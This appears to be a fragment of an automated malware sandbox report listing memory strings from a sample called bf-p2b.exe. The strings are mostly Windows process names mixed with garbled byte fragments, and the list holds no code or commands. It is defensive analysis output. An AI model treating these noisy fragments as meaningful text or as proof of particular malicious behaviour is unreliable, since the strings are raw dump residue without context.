                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: jsvchost.exehmemstr_9a2e05b0-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: psvchost.exememstr_2cddc173-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hb > ;@= ;)memstr_44c7dfa8-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qsvchost.exememstr_6c8a1f8b-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3rctfmon.exehmemstr_67efd83a-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ssvchost.exepmemstr_9675d552-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s4p89memstr_c61525ca-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: uexplorer.exememstr_441ce51e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vsvchost.exehmemstr_fa858e45-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wdashost.exehmemstr_cd6d5f43-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2`1@2memstr_76f0a1e9-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ysvchost.exememstr_c03c47c3-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [startmenuexperiencehost.exememstr_3c5fa956-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \runtimebroker.exememstr_1cf37b86-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ]searchapp.exe8memstr_825e5e21-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ^runtimebroker.exememstr_e5d7612b-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: _svchost.exe(memstr_29de4bcd-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `svchost.exe(memstr_6ef7677a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fdllhost.exepmemstr_430533a5-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )gsmartscreen.exememstr_0d21bd86-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: jsvchost.exememstr_71e2d415-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nwmiprvse.exexmemstr_dff3ca52-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ah]pmemstr_163b668d-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: textinputhost.exememstr_980dba5d-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: audiodg.exememstr_67afb325-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: t"(xymemstr_96cdc493-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exememstr_b41b1a7d-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exehmemstr_ebe3343d-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: mousocoreworker.exememstr_0a713054-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: applicationframehost.exememstr_8f526032-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: winstore.app.exexmemstr_cd0390af-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: systemsettings.exememstr_73f768a5-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: useroobebroker.exepmemstr_3a1912cd-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 580 # q #memstr_297ead67-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wmiprvse.exepmemstr_31fb256e-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #h!`h`h`hmemstr_85dbad53-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sgrmbroker.exehmemstr_21fb4e68-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0$0$0$gmemstr_6294a25c-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8:8:`-`-`-memstr_8536f043-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dllhost.exememstr_4311eb96-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: joooymemstr_96792948-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cscript.exememstr_ae33cbe7-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x x @d@d@d$dmemstr_25a6f7e2-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: conhost.exememstr_e9dbdfde-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wmiprvse.exememstr_36e9f09e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %u]$memstr_66eeb814-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: backgroundtaskhost.exexmemstr_1984bd1b-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .p,p,p,memstr_c417f33a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgbw0memstr_681cb9a1-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exexmemstr_3e4afc7a-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: runtimebroker.exe(memstr_df556b2b-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: upfc.exememstr_7459b429-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: h%h% memstr_6455d750-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exememstr_3efe6327-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: pg`g8memstr_7b5d50cd-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `gpg8memstr_d8a9eeab-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @g0g8memstr_c40045a3-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: pg@g8memstr_ba5bb765-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0g g8memstr_369d7169-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exehmemstr_240ff688-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 9]?l;memstr_05489571-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dllhost.exe(memstr_c9c7e976-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bf-p2b.exememstr_bda7a6f3-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wscript.exememstr_4ab4c829-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: softwarefx-acrobat-reader.exememstr_f5e76658-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemmemstr_6f36b9c7-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: registry(memstr_6075cd31-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: smss.exememstr_cab822ed-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: csrss.exe(memstr_4f45b024-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wininit.exememstr_1b609ac0-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #q^}1memstr_4d2bb20d-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: csrss.exememstr_c47b2ecb-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winlogon.exe`memstr_c37704f9-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z3zbymemstr_7fb5831a-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: services.exememstr_2483ac0e-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: npqpqpqz,kmemstr_29922655-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lsass.exehmemstr_f8eb3d1f-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exe memstr_5cb71c26-b
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fontdrvhost.exe memstr_3e66bab4-5
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fontdrvhost.exememstr_1a143905-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lp\p\p\memstr_4e9d0220-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exehmemstr_087a1b67-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,p#p&p#fmemstr_fd6b08c4-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwm.exememstr_4ef835e0-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p, )pmemstr_f6a299d1-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pi.ememstr_50ac4660-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exexmemstr_92981b6c-5
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exe(memstr_688f211e-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exememstr_32e41b3d-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exe8memstr_60f42804-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @[`pxmemstr_62be097b-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hh!svchost.exehmemstr_86f7eec0-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x"svchost.exememstr_6297d1ce-b
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )2#memory compressionmemstr_5054d4de-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $svchost.exememstr_a97fc1be-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %svchost.exexmemstr_ec26a230-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &svchost.exememstr_204bfb31-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'svchost.exexmemstr_257210d9-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )svchost.exexmemstr_e9810651-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *svchost.exememstr_122ab4f4-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +svchost.exememstr_838a1eea-5
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,svchost.exehmemstr_ff643998-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .svchost.exememstr_607af0fd-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `4x+`memstr_4763f93c-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /svchost.exememstr_ce61b9e0-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <(p6(memstr_4810f0de-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0svchost.exememstr_6dcf3a63-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1svchost.exememstr_2026be84-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2spoolsv.exememstr_8e01fe07-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3svchost.exememstr_78dae2e3-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4svchost.exe(memstr_c2f84256-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5svchost.exehmemstr_f68e1e54-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6svchost.exememstr_0386ce1d-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: txmemstr_52f1a843-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7svchost.exememstr_d79488fa-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \`memstr_0be69206-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &\tmemstr_29921aac-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8svchost.exememstr_f4e8bf4b-5
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d~xzbmemstr_0974d31b-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :svchost.exememstr_8eec7f5d-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <svchost.exememstr_1c526ce6-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %pcnzmemstr_151c4e89-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #=officeclicktorun.exe(memstr_3fc1482a-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >svchost.exexmemstr_e0f17a5f-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?svchost.exexmemstr_bc953dee-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @svchost.exehmemstr_67c941a3-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: asvchost.exememstr_771cd4a6-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: csvchost.exehmemstr_d4a84da9-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dsvchost.exehmemstr_660a4d0c-b
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esvchost.exememstr_aa0b6262-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsvchost.exememstr_55418118-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k0\0]0\.memstr_319f0869-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )gsihost.exememstr_eab757d6-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hsvchost.exexmemstr_c6de6e50-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0p t0pxmemstr_7e7f6876-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: isvchost.exememstr_3f248a45-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsvchost.exememstr_c9b1f165-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psvchost.exexmemstr_61a768f1-7
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hb > ;@= ;)memstr_4dcd2ee8-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qsvchost.exexmemstr_2ebb35b7-b
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3rctfmon.exememstr_89235cf7-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssvchost.exememstr_3f19db50-5
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uexplorer.exememstr_7d9c655b-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsvchost.exexmemstr_0c05a110-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wdashost.exememstr_b20d6627-6
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2`1@2memstr_1ee25b0b-d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ysvchost.exexmemstr_c532f9a4-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [startmenuexperiencehost.exememstr_e4b00bd7-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \runtimebroker.exememstr_3bffb456-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]searchapp.exememstr_2148a7a3-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^runtimebroker.exememstr_02c146c1-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _svchost.exememstr_1f19f57f-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `svchost.exehmemstr_aae5f57f-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fdllhost.exememstr_59b5f7f4-f
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )gsmartscreen.exememstr_53254031-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsvchost.exe`memstr_ff53ea3b-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nwmiprvse.exememstr_9f06fe2d-c
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ah]pmemstr_4433e102-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: textinputhost.exememstr_674d966b-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: audiodg.exe(memstr_34c6c887-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ch0*lmemstr_f4855d29-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runtimebroker.exe(memstr_b18ae941-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runtimebroker.exememstr_91131264-9
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mousocoreworker.exememstr_d0d3fccf-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: applicationframehost.exememstr_7c257169-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winstore.app.exememstr_598d4994-4
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "( "omemstr_c0b9789e-3
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemsettings.exememstr_1e016e55-e
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: useroobebroker.exememstr_6a7ddb21-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 580 # q #memstr_0c1b1499-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmiprvse.exememstr_3e012bfb-1
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #h!`h`h`hmemstr_41b20a38-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sgrmbroker.exememstr_4ea024fd-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svchost.exexmemstr_8767f29a-8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0$0$0$gmemstr_b1bd33df-0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8:8:`-`-`-memstr_046a6ae1-a
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllhost.exexmemstr_33200f7f-2
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: joooymemstr_dd31fe7b-9
